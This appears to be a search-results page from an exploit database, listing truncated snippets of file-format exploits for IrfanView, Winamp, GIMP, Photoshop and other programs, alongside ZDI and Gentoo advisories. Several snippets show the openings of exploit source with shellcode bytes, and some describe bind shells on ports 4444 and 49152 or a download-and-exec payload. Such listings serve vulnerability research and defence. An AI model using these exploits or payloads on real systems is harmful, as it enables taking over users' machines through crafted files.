67 matches found
ZDI-09-019: Microsoft Office PowerPoint OutlineTextRefAtom Parsing Memory Corruption Vulnerability
ZDI-09-019: Microsoft Office PowerPoint OutlineTextRefAtom Parsing Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-019 May 12, 2009 -- CVE ID: CVE-2009-0556 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Office PowerPoint -- TippingPoint(TM) IPS...
Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service
Stack overflow in vbe6.dll, used by all versions of MS Office. The overflow occurs in Visual Basic for Applications. Creating a property with a long name (about 247 chars) results in a stack overflow in vbe6.dll which overwrites the first byte of the return address with a null byte. Probably impossib...
irfanview-corrupt.txt
/* IrfanView 4.10 .FPX File Memory Corruption. This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu. Other bugs exist... */ #include "stdio.h" #include "stdlib.h" #include "string.h" /* win32exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvS...
IrfanView 4.10 - .fpx Memory Corruption
IrfanView 4.10 - .fpx Memory Corruption /* IrfanView 4.10 .FPX File Memory Corruption. This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu. Other bugs exist... */ #include "stdio.h" #include "stdlib.h" #include "string.h" /* win32exec - EXITFUNC=process...
IrfanView 4.10 .FPX File Memory Corruption Exploit
No description provided by source. /* IrfanView 4.10 .FPX File Memory Corruption. This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu [email protected] Other bugs exist... */ #include "stdio.h" #include "stdlib.h" #include "string.h" /* win32exe...
IrfanView 4.10 .FPX File Memory Corruption Exploit
Exploit for unknown platform in category local exploits ================================================== IrfanView 4.10 .FPX File Memory Corruption Exploit ================================================== /* IrfanView 4.10 .FPX File Memory Corruption. This exploit launches calc.exe. Tested...
IrfanView 4.10 - '.fpx' Memory Corruption
/* IrfanView 4.10 .FPX File Memory Corruption. This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu. Other bugs exist... */ #include "stdio.h" #include "stdlib.h" #include "string.h" /* win32exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvS...
nullsoft-overflow.txt
#!/bin/perl Nullsoft Winamp MP4 tags Stack Overflow 0-day discovered and exploited by SYS 49152. Tested on win XP SP2 ENG. Tuned for Nullsoft Winamp 5.32 d.i. Shell on port 49152. usage: well, not much fun for you kids here .. to get the shell you have to use ALT+3 and press UPDATE. Instead this one ...
Photoshop CS2/CS3 / Paint Shop Pro 11.20 .PNG File BoF Exploit
No description provided by source. /* Photoshop CS2/CS3, Paint Shop Pro 11.20 .PNG File Buffer Overflow. Like bitmap files, PNG files can do great things =D. In french: "buffer overflow a gogo!" The generated .PNG file will work for: - Photoshop CS2 - Photoshop CS3 - Photoshop Elements 5.0 - Corel Pain...
gimp2214-overflow.txt
/* :: Kristian Hermansen :: Date: 20070509 Description: Gimp 2.2.14 RAS vuln, thanks to Marsu. This one is a universal download-and-exec using call esp in libgimpcolor-2.0-0.dll. Vulnerable: Gimp 2.2.14 Tested: Gimp 2.2.14 on Windows Vista, XP, 2000 Compile: gcc -o netsniper-gimpu netsniper-gimpu.c...
GLSA-200705-08 : GIMP: Buffer overflow
The remote host is affected by the vulnerability described in GLSA-200705-08 GIMP: Buffer overflow Marsu discovered that the 'setcolortable' function in the SUNRAS plugin is vulnerable to a stack-based buffer overflow. Impact : An attacker could entice a user to open a specially crafted .RAS file...
Adobe Photoshop CS2 / CS3 Unspecified .BMP File Buffer Overflow - vulnerability warning - the black bar safety net
Ghost boy note: same as the last one; the test succeeded on CS3, but CS2 was not tested, as I had previously been using the CS green version and was too lazy to go and test CS2. Source: Security vulnerabilities /* Adobe Photoshop CS2 / CS3 Unspecified .BMP File Buffer Overflow. There is a...
Winamp <= 5.34 .MP4 File Code Execution Exploit
No description provided by source. /* Winamp <= 5.34 .MP4 File Code Execution ...
abcview-overflow.txt
/* ABC-View Manager 1.42 .PSP File Buffer Overflow. ABC-View Manager is vulnerable to an unspecified buffer overflow when processing a crafted .TTF file. This exploit runs calc.exe or binds a shell to port 4444. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu. Note: Open that in...
irfanview-overflow.txt
/* IrfanView */ #include "stdio.h" #include "stdlib.h" /* win32exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char CalcShellcode[] = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"...
winamp-exec.txt
/* Winamp */ #include "stdio.h" #include "stdlib.h" /* win32exec - EXITFUNC=thread CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char CalcShellcode[] = "\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"...
gimp-overflow.txt
/* Gimp v2.2.14 .RAS File SUNRAS Plugin Buffer Overflow. Gimp uses the SUNRAS plugin to process .RAS files, but this module is vulnerable to a buffer overflow in setcolortable which leads to code execution. Vulnerable code, sunras.c:862: int ncols, j; guchar ColorMap[256][3]; ncols = sunhdr->l_ras_maplength / ...
Winamp <= 5.34 .MP4 File Code Execution Exploit
Exploit for unknown platform in category local exploits =============================================== Winamp <= 5.34 .MP4 File Code Execution Exploit =============================================== /* Winamp <= 5.34 .MP4 File Code Execution. Winamp's MP4 plugin fails to handle exceptional...
Winamp 5.34 - '.mp4' Code Execution
/* Winamp <= 5.34 .MP4 File Code Execution. Winamp's MP4 plugin fails to handle exceptional conditions, which can lead to code execution. However, exploitation is hard, firstly because of the return address. This code exploits a call eax, and it might be complicated to find a correct return address...
Winamp 5.34 - .mp4 Code Execution
Winamp 5.34 - .mp4 Code Execution /* Winamp <= 5.34 .MP4 File Code Execution. Winamp's MP4 plugin fails to handle exceptional conditions, which can lead to code execution. However, exploitation is hard, firstly because of the return address. This code exploits a call eax, and it might be complicated...